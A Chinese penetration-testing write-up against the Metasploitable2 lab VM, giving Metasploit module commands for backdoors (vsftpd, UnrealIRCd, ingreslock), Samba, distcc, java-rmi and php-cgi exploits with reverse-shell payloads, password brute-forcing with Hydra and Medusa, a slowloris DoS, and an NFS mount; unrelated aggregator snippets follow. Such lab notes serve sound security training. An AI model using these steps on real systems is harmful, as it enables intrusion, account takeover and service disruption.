Metasploitable2靶机渗透笔记

2023-10-29

信息收集阶段

由于是Vmware中的靶机,所以不做真实IP、旁站、C段、WAF等信息的收集

端口收集:

nmap -sS -sV 靶机IP

获得开放的服务信息:
在这里插入图片描述


统计阶段

  1. VSFTPD 2.3.4(笑脸漏洞)
  2. SSH登录爆破
  3. Telnet爆破
  4. http-CGI/FastCGI
  5. HTTP-DDOS拒绝服务攻击
  6. SMB任意命令执行
  7. exec账密爆破
  8. java-rmi反序列化
  9. ingreslock后门
  10. nfs文件共享漏洞
  11. ftp弱口令
  12. MySQL弱口令
  13. distccd任意命令执行
  14. Postgresql弱口令
  15. vnc弱口令
  16. UnrealIRCd漏洞
  17. tomcat弱口令

利用阶段

VSFTPD 2.3.4

利用方式:

  1. metasploit模块利用
  2. 笑脸:)利用(需要目标机器开启6200端口)
  3. ftp爆破

使用metasploit中的利用模块

msfconsole:进入metasploit
search vsftpd:搜索利用模块
在这里插入图片描述
use exploit/unix/ftp/vsftpd_234_backdoor:使用模块
options:查看需要配置的参数
set rhost 192.168.137.170:设置目标IP
run:开始运行

成功拿到shell

在这里插入图片描述

SSH爆破

利用方式:

  1. metasploit模块利用
  2. ssh爆破

ssh爆破
使用Medusa美杜莎工具爆破该靶机的SSH账密
medusa -M ssh -h 192.168.137.170 -U user.txt -p pass.txt -f -t 5
在这里插入图片描述

使用metasploit中的利用模块

msfconsole:进入metaspolit
search ssh_login:搜索利用模块
use auxiliary/scanner/ssh/ssh_login:使用模块
options:查看需要配置的参数
在这里插入图片描述
set rhosts 192.168.137.170:设置目标机IP
set user_file 用户名字典路径
set pass_file 密码的字典路径
set threads 10:设置线程数量
run:运行
在这里插入图片描述

Telnet爆破

利用方式:

  1. metasploit模块利用
    测试的Hydra和Medusa都无法爆破Telnet,如果是利用错误或者有其他的利用方式希望各位师傅可以为我指出,谢谢啦!

使用metasploit中的利用模块

msfconsole:进入metaspolit
search telnet_login:搜索利用模块
use scanner/telnet/telnet_login:使用模块
options:查看需要配置的参数

在这里插入图片描述

set rhosts 192.168.137.170:设置目标机IP
set user_file 用户名字典路径
set pass_file 密码的字典路径
set threads 10:设置线程数量
run:运行
在这里插入图片描述

CGI/FastCGI

首先了解什么是CGI:

我是从这里了解到有关于CGI知识的

CGI是一个通用网关接口,用于Web服务器与外部应用程序(CGI程序)之间传递信息的接口标准。

当客户端向Web服务器发起一次请求的时候:

如果请求的是静态文件,例如html文件。不调用CGI,也就是不发起CGI请求。Web服务器会直接返回该文件的内容。

如果请求的是动态脚本,例如php文件。调用CGI,发起一次CGI请求。Web服务器会启动对应的CGI程序,将数据进行简单的处理之后交给PGP解释器。

CGI程序会解析请求中的URL,查询字符串(在?之后的参数,每对参数根据键值对来划分,每对参数使用&来分隔),POST数据和HTTP头部的信息,并且根据这些信息生成动态的响应内容。CGI程序会按照CGI协议规定的格式将结果返回给Web服务器,然后Web服务器将结果返回给客户端。

在处理完一个请求之后,CGI程序会退出,如果下次有新的CGI请求,Web服务器会再次启动一个新的CGI进程来处理。

而需要注意的是,随着科技的进步技术的发展,出现了更高效的替代方案,例如FastCGI,WSGI等,他们可以有效的避免每次请求都启动新的进程,提高性能和效率。

什么是FastCGI:

FastCGI是CGI的改进版本,用来改善CGI的性能问题。

而两者的区别为:

CGI:当每次请求到达的时候都会启动一个CGI进程来执行相对应的CGI程序并且处理请求返回结果。而用完之后会销毁这个CGI进程。频繁的创建和销毁CGI进程会对服务器性能有较大的损耗。

FastCGI:FastCGI在Web中引用了一个进程管理器,它会启动一组长时间运行的FastCGI进程。这些FastCGI进程会一直保持运行状态,当每次有请求到达的时候,Web会将请求发给空闲的FastCGI进程,而不需要重新创建进程。避免了频繁的创建和销毁进程,提高了性能和效率。

使用目录扫描成功发现文件:phpinfo.php
在这里插入图片描述
通过访问得知当前的 Server API是CGI/FastCGI
在这里插入图片描述
而该方式在PHP中可能存在CGI参数注入等问题。

CGI 参数注入可能发生的原因主要包括以下情况:

  1. 未正确过滤用户输入:如果 CGI 程序在接收到参数后未对用户输入进行适当的验证和过滤,攻击者可能利用特殊字符或字符串注入恶意代码,从而执行未经授权的操作。

  2. 命令注入:当 CGI 程序在执行系统命令时,如果未正确地对参数进行转义或验证,攻击者可能通过注入恶意命令来执行任意命令。

  3. SQL 注入:如果 CGI 程序在与数据库交互时,未对参数进行参数化查询或预编译语句处理,攻击者可能通过注入恶意 SQL 语句来访问或篡改数据库中的数据。

  4. 文件路径注入:在文件操作中,如果 CGI 程序未正确验证和处理文件路径参数,攻击者可能注入特殊路径来访问敏感文件或执行恶意操作。

利用方式:

  1. metasploit模块利用

使用metasploit中的利用模块

msfconsole:进入metasplot
search php_cgi:搜索利用模块
use exploit/multi/http/php_cgi_arg_injection:使用模块
options:查看需要配置的参数

在这里插入图片描述
set rhost 192.168.137.170:设置目标机IP
run:运行

在这里插入图片描述

DDOS拒绝服务攻击

通过db_nmap漏洞扫描得知存在一个CVE漏洞,并且通过查询得知,该CVE是一个DDOS攻击。

db_nmap --script=vuln -p 80 -T4 192.168.137.170

利用方式:

  1. metasploit模块利用

使用metasploit中的利用模块

msfconsole:进入metasploit
search slowloris:搜索利用模块
use auxiliary/dos/http/slowloris:使用模块
options:查看需要配置的参数

在这里插入图片描述

set rhost 192.168.137.170:设计目标机IP
run:运行

SMB任意命令执行

139与445分别为:NetBIOS协议和SMB协议,都涉及文件共享和通信。

但是NetBIOS是早期用于文件共享和通信的协议。由于安全性和设计限制等问题,逐渐被SMB取代。

也可以理解为SMB协议是NetBIOS的平替或者升级版。

由于139和445都属于SMB服务类型,所以两者可能存在相同的漏洞,这点可以在nmap扫描中获得关键信息。

在这里插入图片描述

利用方式:

  1. metasploit模块利用

使用metasplooit中的利用模块

msfconsole:进入metasploit
search samba:搜索利用模块
use exploit/multi/samba/usermap_script:使用模块
options:查看需要配置的参数

在这里插入图片描述

set rhosts 192.168.137.170:设置目标机IP
run:运行

exec账密爆破

有的师傅说该服务可以使用hydra进行爆破

我使用的命令为:hydra -L username.txt -P password.txt rexec 没有爆破成功

如果是使用错误希望各位师傅指出

java-rmi反序列化

使用db_nmap扫描该端口

db_nmap --script=vuln -p 1099 192.168.137.170提示该端口的状态为脆弱

利用方式:

  1. metasploit模块利用

使用metasploit中的利用模块

msfconsole:进入metasploit
search java_rmi:搜索利用模块
use exploit/multi/misc/java_rmi_server:使用模块
options:查看需要配置的参数

在这里插入图片描述

set rhosts 192.168.137.170:设置目标机IP
run:运行

ingreslock后门

使用db_nmap扫描该端口

db_nmap --script=vuln -p 1524 192.168.137.170显示当前端口服务名为ingreslock

ingreslock是一个早期的数据库管理系统漏洞,它可能导致很严重的安全问题

利用方式:

  1. Telnet连接

使用Telnet连接

telnet 192.168.137.170 1524

在这里插入图片描述

nfs文件共享漏洞

使用命令查看文件共享情况:showmount -e 192.168.137.170

在这里插入图片描述

所有文件共享

利用方式:

  1. mount进行共享

开始利用

mkdir /temp/:在攻击机的根目录创建temp文件夹
mount -t 192.168.137.170:/ ./temp -o nolock:将temp与目标机共享
cd /temp:进入共享文件夹
ll:查看所有文件以及目录

在这里插入图片描述

ftp弱口令

利用方式:

  1. metasploit模块利用

使用metasploit中的利用模块

msfconsole:进入metasploit
search ftp_login:搜索利用模块
use scanner/ftp/ftp_login:使用模块
options:查看需要配置的参数

在这里插入图片描述

set rhosts 192.168.137.170:设置目标机IP
set rport 2121:设置目标机端口(由于该ftp服务开启的为2121端口,所以需要修改端口)
set userpass_file /usr/local/my-files/pass-notebook/123.txt(值得一提的是,账密格式为)

USERNAME1 PASSWORD1
USERNAME2 PASSWORD2
USERNAME3 PASSWORD3
… …

run:运行

在这里插入图片描述

MySQL弱口令

利用方式

  1. metasploit模块利用

使用metasploit中的利用模块

msfconsole:进入metasploit
search mysql:搜索利用模块
use scanner/mysql/mysql_login:使用模块
options:查看需要配置的参数

在这里插入图片描述

set rhosts 192.168.137.170:设置目标机IP
run:运行

在这里插入图片描述
没有密码,输入root可以直接登录

Distccd任意命令执行

使用db_nmap扫描该端口

db_nmap --script=vuln -p 3632 192.168.137.170提示当前端口存在一个CVE漏洞。

漏洞编号:cve-2004-2687

利用方式:

  1. metasploit模块利用

使用metasploit中的利用模块

msfconsole:进入metasploit
search distcc:搜索利用模块
use exploit/unix/misc/distcc_exec:使用模块
options:查看需要配置的参数

在这里插入图片描述

set rhosts 192.168.137.170:设置目标机IP
set payload cmd/unix/reverse:设置攻击载荷
run:运行

Postgresql弱口令

利用方式:

  1. metasploit模块利用
  2. Hydra爆破

使用metasploit中的利用模块

msfconsole:进入metasploit
search postgres:搜索利用模块
use scanner/postgres/postgres_login:使用模块
options:查看需要配置的参数

在这里插入图片描述

set rhosts 192.168.137.170:设置目标机IP
run:运行(自带账号密码本,所以不需要额外设置)

在这里插入图片描述

Hydra爆破

使用命令:hydra -L 用户名字典 -P 密码字典 192.168.137.170 postgres -s 5432 -t 8

vnc弱口令

利用方式:

  1. metasploit模块利用
  2. Medusa爆破

使用metasploit中的利用模块

msfconsole:进入metasploit
search vnc_login:搜索利用模块
use scanner/vnc/vnc_login:使用模块
options:查看需要配置的参数

在这里插入图片描述

set rhosts 192.168.137.170:设置目标机IP
run:运行(自带账号密码本,所以不需要额外设置)

在这里插入图片描述

Medusa爆破

使用命令:medusa -h 192.168.137.170 -u "" -P pass.txt -M vnc -t 4

UnrealIRCd漏洞

UnrealIRCd 曾经存在严重的安全漏洞,可能导致远程代码执行和获取系统访问权限。

其中,最知名的是 UnrealIRCd 3.2.8.1 版本的“幽灵漏洞”(Ghost Vulnerability),也被编号为CVE-2010-2075。这个漏洞允许攻击者通过特定的恶意请求在目标服务器上执行任意代码,从而获得服务器的控制权。该漏洞曾广泛被利用。

利用方式:

  1. metasploit模块利用

使用metasploit中的利用模块

msfconsole:进入metasploit
search ircd:搜索利用模块
use exploit/unix/irc/unreal_ircd_3281_backdoor:使用模块
options:查看需要配置的参数

在这里插入图片描述

set rhosts 192.168.137.170:设置目标机IP
set lhost 192.168.137.130:设置攻击机IP
set payload cmd/unix/reverse:设置攻击载荷
run:运行

tomcat弱口令

利用方式:

  1. metasploit模块利用
  2. Hydra爆破

使用metasploit中的利用模块

msfconsole:进入metasploit
search tomcat:搜索利用模块
use auxiliary/scanner/http/tomcat_mgr_login:使用模块
options:查看需要配置的参数

在这里插入图片描述

set rhosts 192.168.137.170:设置目标机IP
set rport 8180:设置端口(因为不是默认的8080,所以需要设置8180)
run:运行(自带账号密码本,所以不需要额外设置)

在这里插入图片描述

Hydra爆破

使用命令:hydra -L user.txt -P pass.txt 192.168.137.170 -s 8180 http-get /manager/html

在这里插入图片描述

本文内容由网友自发贡献,版权归原作者所有,本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容,请联系:hwhale#tublm.com(使用前将#替换为@)

Metasploitable2靶机渗透笔记 的相关文章

随机推荐

  • linux -- 命令行中大于号、小于号的用法

    语法 命令 lt 文件 这是将文件作为命令输入 命令 lt 文件1 gt 文件2 将文件1输入到命令中 然后将结果输出到文件2中
  • tensorflow各版本下载地址

    https pypi org project tensorflow gpu 1 13 0 files 把13改对你想要的版本 转载于 https www cnblogs com xpylovely p 11609250 html
  • 2022 re:Invent 凌云驭势 重塑未来

    2022年11月29日 一年一度的亚马逊 re Invent全球大会在拉斯维加斯再度上演 这是亚马逊云科技第11年举办re Invent 来自全球的5万多客户和合作伙伴参加了此次线下盛会 还有超过30万人线上参会 在此次大会上 亚马逊云科技
  • 埃斯顿服务器上电无显示,埃斯顿伺服常见现象报警及排除

    用户在试用埃斯顿伺服电机时可能会遇见以下的问题 在此我整理一下 希望能帮助到大家 一 过载报警A04 1 伺服电机的配线有误或配线有漏 1 电机U V W相线接错 2 伺服电机侧连接器的插入是否不良 2 伺服驱动器与电机的型号不匹配 检查驱
  • Android 内存泄漏的原因以及解决方案

    内存泄漏是什么 内存泄漏即 ML Memory Leak 指 程序在申请内存后 当该内存不需再使用 但 却无法被释放 归还给 程序的现象 内存泄漏的原因以及解决方案 内存泄漏的原因归根到底就是当需要被回收变量的内存被其他变量引用持有 导致内
  • 光照 (4) 镜面光贴图示例

    通过使用镜面光贴图我们可以可以对物体设置大量的细节 比如物体的哪些部分需要有闪闪发光的属性 我们甚至可以设置它们对应的强度 镜面光贴图能够在漫反射贴图之上给予我们更高一层的控制 step1 对镜面光贴图使用一个不同的纹理单元 见纹理 在渲染
  • 软考高级之系统架构师之项目管理

    今天是2023年09月06日 距离软考高级只有58天 加油 概念 临时性 是指每一个项目都有一个明确的开始时间和结束时间 临时性也指项目是一次性的 风险 风险具有以下特性 客观性 偶然性 相对性 社会性 不确定性 风险的四要素 事件 原因
  • 邮件服务器测试方法

    邮件服务器测试方法一 测试是在问题邮件服务器上完成的 二 登陆问题邮件服务器 使用nslookup命令查看需测试的邮件服务器域名解析记录 找到测试端的DNS可以解析到的MX记录 三 通过TELNET命令进行测试 一 TELNET需注意的事项
  • 什么是爬虫?爬虫的具体作用?

    什么是爬虫 答 爬虫的官方名字 spider 爬虫又被称之为网络蜘蛛 网络机器人等 就是模拟客户端发送网络请求 接收请求响应 按照一定的规则自动的抓取互联网信息的程序 爬虫的具体作用 答 数据采集 搜索引擎 软件测试 短信轰炸等等 一般是用
  • Web前端面试指导(三十八):js延迟加载的方式有哪些?

    题目点评 主要考察对程序的性能方面是否有研究 程序的性能是一个项目不断地追求的 通常也是项目完成后需要长期做的一件事情 像腾讯QQ依然对程序的性能不断地做优化 让用户的体验更好 性能优化的核心思想就是快 可以预先准备数据 如缓存的使用 可以
  • 使用C++ 编写嵌入式应用程序

    大多数嵌入式工程师使用C语言来编写Cortex M系列MCU 的程序 大家总觉得C 是用来编写Windows 或者Linux 应用程序的 特别是硬件工程师 也许压根就没有使用C 来编写程序 当我们阅读Mbed OS 的代码时却发现 许多是使
  • mysql--备份/主从同步/安装

    1 编写脚本 支持让用户自主选择 使用mysqldump还是xtraback全量备份 bin bash date date F sock S data mysql mysql3306 socket mysql sock dbdir back
  • vue iframe 刷新保留在原来的页面

    公司有个需求 我们的项目是微服务项目 每个tab里面的内容都是 iframe 现在需求是点击刷新 F5 等刷新 iframe 还保留在原来的页面 1 iframe 子页面 router js 中监听路由变化 并存储当前页面的路由 route
  • 【Linux】Ubuntu基本使用与配置, 以及常见问题汇总(一)

    前言 大学期间 感觉很多时候学习课外知识都是被推着往前走 很多内容并没有深入去学习 知识的记录受限于所学比较片面 如今渐渐意识到似乎并没有建立起相关知识的体系架构 缺乏一个系统学习并整理的过程 本文将以Ubuntu系统为例 来整理一些Lin
  • R手册(Common)--R语言入门

    说明 本节中大部分内容摘自书籍 R语言实战 第2版 文章目录 RStudio Take control of your R code 数据处理一般流程 R 数据结构 R 运算符 概率函数 控制语句与循环语句 自定义函数 调试 拟合线性模型f
  • weex stream 方法封装

    1 封装 api js 配置API接口地址 const baseUrl http www kuitao8 com 引入 弹窗组件 var modal weex requireModule modal 引入 请求数据组件 var stream
  • python记录鼠标键盘操作自动执行重复工作

    系列文章目录 文章目录 系列文章目录 前言 github项目原地址 一 执行方法 二 python录制 1 Frame1 py 2 KeymouseGo py 三 说明书 KeymouseGo v2 2 基本操作 提示 脚本格式说明 使用命
  • OpenCV2.4.13+VS2013开发环境配置

    转载自 http blog csdn net SherryD article details 51734334 List1 完成 写在前面 之前电脑很杂乱的装了OpenCV的2个版本 在配置OpenCV和VS2013环境时死活配不好 但是接
  • PS小技巧补充1

    在使用移动工具 已勾选自动选择 的时候 想要移动某个图层 可以点中图层 然后按下 Ctrl 键 可以看见左上角的自动选择已经被取消了 这时可以在画布的任意位置 移动该图层的内容 按住 Alt 键不放 滚动鼠标滚轮 可以实现快速的画布放大缩小
  • Metasploitable2靶机渗透笔记

    信息收集阶段 由于是Vmware中的靶机 所以不做真实IP 旁站 C段 WAF等信息的收集 端口收集 nmap sS sV 靶机IP 获得开放的服务信息 统计阶段 VSFTPD 2 3 4 笑脸漏洞 SSH登录爆破 Telnet爆破 htt